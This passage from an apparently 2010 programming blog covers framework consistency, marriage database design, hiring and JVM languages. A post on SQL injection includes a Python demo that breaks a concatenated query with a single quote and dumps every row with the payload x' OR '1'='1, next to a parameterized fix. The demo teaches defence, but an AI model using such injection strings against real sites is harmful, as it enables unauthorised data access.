Finally, with that done, the company says to the programmer, “Great, now we are going to start a totally new project, the def project. You can use any technology you want for this. You can invent your own framework for this, if you want.” The new programmer rejoices! Finally, they will be allowed to do things their way! They will get to write code that makes sense to them! They will get to build an architecture that makes sense to them! The programmer invents their own software and builds def. Since the programmer thinks they are working alone, they allow themselves to cut corners. They copy and paste code. They do not refactor as much as they should. They do not document much, since they assume they are the only ones working with the code.

After 3 years, the programmer leaves to take a new job somewhere else. The “abc” company now hires a new PHP programmer. The new programmer must now work with the patched, extended, bloated project of xyz. They must also work with def, which they find confusing. Each project was written by a different programmer, uses a different architecture, and makes different assumptions about what good code is.

You see the problem? This is not sustainable.

Consider Kris’s words:

“People with different backgrounds have different ideas about what is good, and there are probably frameworks for every possible set of ideas you and I could think of.”

That is the problem that can be fixed by committing to a framework.

Just to be clear, I think the choice of a framework might be arbitrary, and yet will still be useful. That is, the framework does not have to be the “best”. It merely needs to offer consistency. There is a great benefit to consistency, especially over the long term. I mean, it is good if you can get several programmers who will work with some basic set of core assumptions – a decent framework will offer that.

Another problem that I have seen a lot of is the programmer who thinks they are working alone. Either they are the only programmer at the business, or they are assigned some project that belongs to them and which no other programmer is allowed to touch. So they think they are alone. But after a few years, they leave the company, and some other programmer is brought in to handle their work.

Over time, all projects involve multiple programmers. Programmers seem to be slow to recognize this. After some years, they will move on, and some other programmer will have to work on their code. I wish more programmers could be made to see this.

I am especially aware of this right now because, as I said, in 2 of my last 3 gigs I have been brought in to save/rebuild code left by some other programmer.

Gay marriage: how to design the database

Thursday, March 11th, 2010

Gay marriage: the database engineering perspective. This is great stuff. The essay is ostensibly about how to handle the recording of gay marriage in a database. But it uses the issue of gay marriage to go through every classic issue of database design, from foreign keys to normalization to the degree of abstraction needed to handle polyamorous marriages. From now on, when I’ve got a friend trying to learn how to design databases, I will send them to this essay.

There are various objections to expanding the conventional, up-tight, as-God-intended “one man, one woman” notion of marriage but by far the least plainly bigoted ones I am aware of are the bureaucratic ones.

To be blunt, the systems aren’t set up to handle it. The paper forms have a space for the husband’s name and a space for the wife’s name. Married people carefully enter their details in block capitals and post the forms off to depressed paper-pushers who then type that information into software front-ends whose forms are laid out and named in precisely the same fashion. And then they hit “submit” and the information is filed away electronically in databases which simply keel over or belch integrity errors when presented with something so profound as a man and another man who love each other enough to want to file joint tax returns.

Speaking as a computery-type person, altering the paper forms is not my department. It’s probably expensive and there are probably millions of existing incorrect forms which would need returning or recycling or burning instead of using. Or maybe it’s simple. I don’t know. The real question from my perspective is how you store a marriage in a computer.

Altering your database schema to accommodate gay marriage can be easy or difficult depending on how smart you were when you originally set up your system to accommodate heterosexuality only. Let’s begin.
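The essay works through the design in far more detail, but the core move can be sketched briefly, assuming SQLite through Python's standard `sqlite3` module: treat a marriage as its own entity and link people to it through a join table, so there are no “husband” and “wife” columns to belch integrity errors. The table and function names (`person`, `marriage`, `marriage_partner`, `record_marriage`, `spouses`) are illustrative choices, not the essay's own schema.

```python
import sqlite3

SCHEMA = """
CREATE TABLE person (
    person_id INTEGER PRIMARY KEY,
    name      TEXT NOT NULL
);
-- A marriage is its own row: no husband or wife columns.
CREATE TABLE marriage (
    marriage_id INTEGER PRIMARY KEY,
    start_date  TEXT NOT NULL,
    end_date    TEXT          -- NULL while the marriage is ongoing
);
-- One row per spouse, so a marriage can have two partners or more.
CREATE TABLE marriage_partner (
    marriage_id INTEGER NOT NULL REFERENCES marriage(marriage_id),
    person_id   INTEGER NOT NULL REFERENCES person(person_id),
    PRIMARY KEY (marriage_id, person_id)
);
"""


def connect() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("PRAGMA foreign_keys = ON")  # SQLite enforces FKs only when enabled
    conn.executescript(SCHEMA)
    return conn


def record_marriage(conn: sqlite3.Connection, start_date: str, person_ids: list) -> int:
    # "with conn" commits on success and rolls back if any insert fails,
    # so a bad person_id never leaves an orphaned marriage row behind.
    with conn:
        cur = conn.execute("INSERT INTO marriage (start_date) VALUES (?)", (start_date,))
        marriage_id = cur.lastrowid
        conn.executemany(
            "INSERT INTO marriage_partner (marriage_id, person_id) VALUES (?, ?)",
            [(marriage_id, pid) for pid in person_ids],
        )
    return marriage_id


def spouses(conn: sqlite3.Connection, marriage_id: int) -> list:
    rows = conn.execute(
        "SELECT p.name FROM marriage_partner AS mp "
        "JOIN person AS p ON p.person_id = mp.person_id "
        "WHERE mp.marriage_id = ? ORDER BY p.name",
        (marriage_id,),
    )
    return [name for (name,) in rows]


conn = connect()
conn.executemany(
    "INSERT INTO person (person_id, name) VALUES (?, ?)",
    [(1, "Alan"), (2, "Brian"), (3, "Carol"), (4, "Dana"), (5, "Eve")],
)
pair = record_marriage(conn, "2010-03-11", [1, 2])
trio = record_marriage(conn, "2010-03-11", [3, 4, 5])
print(spouses(conn, pair))  # ['Alan', 'Brian']
```

The schema never asks about gender, and the polyamorous case needs no schema change at all, only more rows in `marriage_partner`.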

Who can learn to program?

Tuesday, March 9th, 2010

I am intrigued by the idea that some people are simply unable to learn to program:

It has taken us some time to dare to believe in our own results. It now seems to us, although we are aware that at this point we do not have sufficient data, and so it must remain a speculation, that what distinguishes the three groups in the first test is their different attitudes to meaninglessness.

Formal logical proofs, and therefore programs – formal logical proofs that particular computations are possible, expressed in a formal system called a programming language – are utterly meaningless. To write a computer program you have to come to terms with this, to accept that whatever you might want the program to mean, the machine will blindly follow its meaningless rules and come to some meaningless conclusion. In the test the consistent group showed a pre-acceptance of this fact: they are capable of seeing mathematical calculation problems in terms of rules, and can follow those rules wheresoever they may lead. The inconsistent group, on the other hand, looks for meaning where it is not. The blank group knows that it is looking at meaninglessness, and refuses to deal with it.

SQL Injection attacks are more common than developers realize

Saturday, March 6th, 2010

RafalLos writes:

Now – without doing any actual hacking, I immediately noticed that something was wrong. While it’s hard to read the SQL error – it reads “ADODB.Field error ‘80020009’ Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record. /menu.asp line 0”. Without even pulling out the Google search I already knew what that meant – I wasn’t the first one there with malicious intent.

Immediately the folks at the back of the room took notice of the error, and started asking each other if anyone had heard that the site was having issues, or was down…

I decided to quit, in case this site was down intentionally, or something was actually broken… but the gentlemen in the front row pressed me to continue, to “see if there was actually a vulnerability”. Quickly I took a simple glance at the URL line, and appended the tell-tale test for SQL Injection, the single tick (').
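To see why a single tick is such a telling test, here is a minimal sketch using Python's built-in `sqlite3` module rather than the ASP/ADODB stack in Los's story; the `menu` table and both functions are hypothetical. When user input is concatenated into the SQL text, a stray `'` breaks the query and raises an error, and a crafted value can change what the query means. A parameterized query treats the same input as plain data.

```python
import sqlite3

# Hypothetical table standing in for whatever /menu.asp was querying.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE menu (item_id INTEGER PRIMARY KEY, name TEXT)")
conn.executemany("INSERT INTO menu (name) VALUES (?)", [("soup",), ("salad",)])


def find_unsafe(name: str) -> list:
    # Vulnerable: the input is pasted straight into the SQL text.
    sql = "SELECT item_id FROM menu WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def find_safe(name: str) -> list:
    # Parameterized: the value travels separately from the SQL text,
    # so quotes inside it are never parsed as SQL.
    return conn.execute("SELECT item_id FROM menu WHERE name = ?", (name,)).fetchall()


try:
    find_unsafe("soup'")  # the "single tick" test: leaves an unterminated string
except sqlite3.OperationalError as err:
    print("unsafe query broke:", err)

print(sorted(find_unsafe("x' OR '1'='1")))  # [(1,), (2,)]: every row comes back
print(find_safe("x' OR '1'='1"))            # []
```

An error page in response to a lone quote is exactly the symptom in the story: it tells an attacker the input reached the SQL parser unescaped.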

The Ruby language takes off, and CNET misses the story

Monday, February 22nd, 2010

CNET has an odd story called “PHP and Perl crashing the enterprise party”. They then show a graph that shows usage of Perl is dead flat or even declining. The graph also shows Python being the script language with the fastest increase in usage. So if the title was based on the graph, then it should have read “PHP and Python crashing the enterprise party”. But even that would have been a lie, because they left out Ruby. When you look at this graph with Ruby in it, you realize that Ruby blows everything else away. Python and PHP both lag behind Ruby in a big way.

A clever SSH trick

Sunday, February 21st, 2010

An easy way to configure SSH to make logging in a breeze.

Eli White responds to Fabien Potencier regarding template engines

Sunday, February 21st, 2010

Over on Symfony Nerds, I wrote about Potencier’s ideas about a template engine. I just noticed that Eli White had also written an intelligent reply, well worth reading.

RESTful architectures and Symfony: how big should modules be?

Saturday, February 20th, 2010

I’ve a new post up at Symfony Nerds. In it, I look at the implications of a RESTful architecture for Symfony. Should every module just have 4 actions: create, read, update and delete?
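One way to picture the question, as a hypothetical sketch in Python rather than Symfony's actual routing system: map each HTTP method, plus whether the URL names a single resource, to one action. The `ROUTES` table and `route` function are invented for illustration. Listing a collection (a `GET` with no id) does not fit neatly into the four CRUD actions, so a module built this way usually ends up with a fifth.

```python
from typing import Optional, Tuple

# Hypothetical routing table: (HTTP method, URL names one resource?) -> action.
ROUTES = {
    ("POST", False): "create",
    ("GET", True): "read",
    ("PUT", True): "update",
    ("DELETE", True): "delete",
    ("GET", False): "list",  # listing a collection: the fifth action in practice
}


def route(method: str, path: str) -> Tuple[str, str, Optional[str]]:
    """Map e.g. ("GET", "/articles/42") to ("articles", "read", "42")."""
    parts = [p for p in path.split("/") if p]
    if not 1 <= len(parts) <= 2:
        raise ValueError(f"unsupported path: {path}")
    module = parts[0]
    resource_id = parts[1] if len(parts) == 2 else None
    key = (method.upper(), resource_id is not None)
    if key not in ROUTES:
        raise ValueError(f"{method} is not allowed on {path}")
    return module, ROUTES[key], resource_id


print(route("GET", "/articles/42"))  # ('articles', 'read', '42')
print(route("POST", "/articles"))    # ('articles', 'create', None)
```

Under this scheme a module stays small because every URL it answers to is either the collection or one member of it; anything else needs another module or an extra action.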

How to handle floating point math on a computer

Thursday, January 28th, 2010

I stumbled upon this essay, apparently regarded by some as a classic. I have not read it all, though it looks like it answers a lot of my questions about the bizarre handling of floating point numbers that I’ve noticed in some situations. What Every Computer Scientist Should Know About Floating-Point Arithmetic.
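A small Python illustration of the kind of oddity the essay explains (the examples here are not from the essay): 0.1 has no exact binary representation, so sums that look exact are not. Comparing within a tolerance (`math.isclose`), summing with `math.fsum`, or switching to decimal arithmetic (`decimal.Decimal`) are standard workarounds.

```python
import math
from decimal import Decimal

naive = 0.1 + 0.2
print(naive)                     # 0.30000000000000004
print(naive == 0.3)              # False
print(math.isclose(naive, 0.3))  # True: compare within a tolerance instead

tenths = [0.1] * 10
print(sum(tenths))               # 0.9999999999999999
print(math.fsum(tenths))         # 1.0: fsum avoids the accumulated rounding error

# Decimal stores base-10 digits exactly, which suits money and similar data.
print(Decimal("0.1") + Decimal("0.2") == Decimal("0.3"))  # True
```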

How to hire programmers

Friday, January 15th, 2010

Colin Steele writes about hiring programmers and asking them to show a code sample:

Since I’ve long viewed the practice of programming as a craft, I’ve tried to apply the notion of a portfolio, a gimmick I learned from my boss back at AOL. A good programmer should have a body of work, which can be shown, and in it you will find strong clues as to the type of programmer they are. So unless I’ve worked with someone before, directly, along with references and resumes, I ask them to provide:

A significant code sample which you feel is representative of your best recent work.

You might be surprised how that surprises folks. I’m not sure if they think I’m going to poach their code, or rat them out to the employers whom they were working for when they wrote it, or what. In any case, of those that get over it and send me something, a disheartening number send me what amount to toys – 100 line incomplete snippets of something-or-other. Or, just as bad, a swath of user interface callback code, or a class definition that’s 90% setters and getters. Sigh.

Once I’ve settled on the notion that a particular person might be a good hire, I try them out. That amounts to a six-month “no fault divorce” period, where the candidate is brought on board as a 1099 contractor, but in all other ways as a full fledged member of the team. Most folks need six months to settle in, get embedded in team dynamics, and learn enough of the problem domain to be useful. During that time, if anything doesn’t feel right – and I do this purely based on gut instincts – I gently end the relationship.

I can imagine for some kinds of coding this is especially important. If you’re writing an application whose main goal is data mining, then to see a code sample that shows an unusual cleverness in sorting or averaging or summing or grouping or parsing might be very important. However, that would not apply to a lot of the work I have done over the last 10 years. I might make a distinction between the engineers who design cars versus the car mechanics who fix cars. The engineers have to know a lot more than the mechanics. But for about 95% of the web sites I’ve built over the last 10 years, the work has been more like that of a car mechanic, rather than that of a car designer.

Much of the work I’ve done, and for which I’ve hired people, has been straightforward CMS work, which, in a sense, is the simplest kind of programming – designing the database is one of the few high-level, strategic decisions one has to make for that kind of work. The rest is just writing some code to either put data into the database, or take data out of the database. These projects do not necessarily demand great technical cleverness, but they do demand clear thinking. The worst thing about CMS projects is the way the code tends to sprawl over time. After 3 or 4 years working on a CMS, you find you have 50 modules, and you find the amount of redundant code building up in your system is allowing the same bugs to show up, again and again and again. The need to keep things organized eventually becomes the #1 priority. I’d be unable to figure out how well-organized someone is from a short code snippet. For me, the important test is the one Steele mentions at the end – giving someone a test of a few months.

But of course, one needs to screen out the folks who are really bad. Since 2006, I’ve had to hire programmers for 3 different projects. As I wrote in How Much Should You Lie On Your Resume:

The interviews were amazing. People would claim all kinds of things on their resume that they couldn’t defend when we met for an interview.

One woman said she knew Javascript. During the interview, I asked how well she knew Javascript. She said she’d taken a class in it during 1999 (that’s 8 years previous!). Could she write a single line of Javascript now? Um, no. But, uh, if she started working with it, she was sure it would come back quickly.

One fellow said he knew PHP and MySQL. Turns out his experience consisted of a single small project he’d done for fun, at work. He was working as a tech support person at a local community college, and one of his main tasks was to help people when they forgot their passwords. So he wrote a tiny database program into which he could record usernames and passwords and email addresses. This consisted of about 6 screens. The PHP code was unbelievably primitive: he didn’t know what functions were, so when he wanted to break up his code into pieces, he put each routine into its own file, and then he would include that file when he wanted to trigger the code. And all the HTML was hard coded into the PHP. Awful. And the poor guy had no idea how much he still had to learn.

We spoke to a woman who said she knew Java, but had no Java projects that she could point us to, not even little demos on her laptop.

Many of the people we spoke to were just moving past the point of unconscious incompetence. They simply had no idea how they appeared to us.

We spoke to a lot of people who were clearly beginners, yet they claimed to know more technologies than I do. A typical list: Javascript, CSS, HTML, XHTML, RSS, Atom, Flash, ActionScript, Java, .Net, C, C++, Python, Perl, PHP, Linux, MySQL, Oracle, Microsoft Server, Windows, Apache, IIS, Photoshop, Final Cut Pro, iMovie, Mac OS, and SOAP.

…What a lot of beginners seem to do is they include on their resume stuff they were briefly exposed to during some class in college. So if, for one day, they got to write some SQL queries against a dummy database set up in Oracle, they then claimed that they knew Oracle. I think what this approach communicates, more than anything, is insecurity. I realize that it is tough to get one’s career started, but still, you might want to leave off the stuff that you’ve only had a day or two exposure to.

The more extreme cases can be weeded out with an interview. For the rest, sometimes you can get a sense of who they are if they have a blog. But a lot of the time, it comes down to giving people a try and seeing how they do.

There are a lot of decisions where an argument can be made for 2 radically different approaches. This summer I had a conversation with a programmer who did very good work, about how many databases should be in use on our website. I felt that the right answer was “one”; he felt the right answer was “two”. Part of the site was being built in Symfony, and part of the site was simply a WordPress blog. He argued that putting each application in its own database was “loose coupling”. In this case, I thought it would be a huge headache. We wanted to integrate data from both applications on our home page, and the idea of drawing data from 2 different databases to create our homepage struck me as way too much work. He was aggressive in defending his opinion and he regarded my final decision with a certain amount of contempt. All the same, the programming he did was excellent, and he was very fast, so I’d hire him again for future projects (though I wouldn’t take his advice on architectural decisions).

When I think about the next time I might hire, I think about how I might give someone a try without wasting too much money. I’d like to think that it’s possible to figure out who is good, and who is bad, after just a week or two of working together. The big challenge is the 6 month wait that Steele describes:

Most folks need six months to settle in, get embedded in team dynamics, and learn enough of the problem domain to be useful.

I try to find tasks that only take a week and which reveal a lot about what kind of programmer I’m dealing with. This is a large-scale version of asking for a code snippet. This worked out well for us when I was at Bluewall and we were looking for a Flash programmer. After interviewing Starrie Williamson, I decided to give her a very short, small project. I liked how she handled her first, small assignment, so we ended up working with her for the next year.

Groovy as a script language for Open Office

Wednesday, January 13th, 2010

I post this only because I am impressed with the extent to which the JVM world is now able to fight back against Microsoft: Record macros in OpenOffice with Groovy

Windows/Mac/Linux (OpenOffice): Free OpenOffice extension Groovy makes it possible to record and run Macros in OpenOffice. Don’t confuse Groovy for a cheap Visual Basic knockoff. Groovy has its own syntax similar to bash mixed with Java. If you were sticking to Microsoft Office solely for its macro capabilities, you may be able to break away with Groovy. Unfortunately, Groovy is not nearly as beginner friendly as VB/VBA. However, beginners will have no problem getting started with simple macros. Groovy is a free extension for all platforms with OpenOffice. Here is an ODT with several sample macros to help you get your feet wet (remember, you need to install Groovy before you can run the macros).

Polyglot programming: the best of everything, all combined

Wednesday, January 13th, 2010

I first got interested in Java in 2003. I played around with it for a year, doing minor toy projects. I finally decided that I hated it: too verbose, too redundant, too much aimed at the Enterprise, not dynamic or agile. Java is inappropriate for fast-moving startups. I turned my back on Java and therefore missed the explosion of dynamic languages that run on the JVM: Jython, JRuby, JavaFX, Groovy, etc. In other words, I turned my back on the Java ecosystem just at the moment that it finally started to get interesting.

About a year ago I began to focus again on the world of the JVM. At first I was over-enthusiastic about JavaFX. Then I was frustrated by its lack of progress. Some at Sun have talked as if JavaFX was Swing 2.0, the future of Java GUI programming. But with JavaFX one has to jump through some hoops to integrate with Java code, whereas other JVM languages, such as Groovy, allow seamless integration.

Given that background, I am fascinated to read that Griffon is making it easier to do polyglot programming with the JVM languages:

If you’ve followed the Griffon news in the last 12 months you may be aware that Griffon is a fun and rapid desktop/rich application development framework inspired by Grails; that there are more than 40 released plugins and that polyglot programming is pretty much a done deal (Groovy, Java, JavaFX, Scala & Clojure). Griffon was born as a means to get Swing applications off the ground quickly; a few months ago it gained the capability of mixing Swing and JavaFX components in the same application.

Just recently it went a bit further than that.

Swing is not the only toolkit that can be used with Java in order to create desktop applications; JavaFX is clearly one alternative (though at the time of writing this entry it still lacks a full set of controls and a healthy ecosystem of 3rd party components, but that’s another story). There is also SWT, which provides better fidelity as it talks to native widgets directly as opposed to Swing. However that also imposes some restrictions (like skinning) but that has not kept the proponents of the toolkit (and Eclipse) from using it at every turn. There is also another newcomer: Pivot. Fresh from VMWare labs it quickly found a place at the Apache Incubator where it’s been nurtured and awaits the moment of graduation.

What do these toolkits have to do with Griffon? Well as it turns out there is experimental (i.e., not finished yet) support for both SWT and Pivot.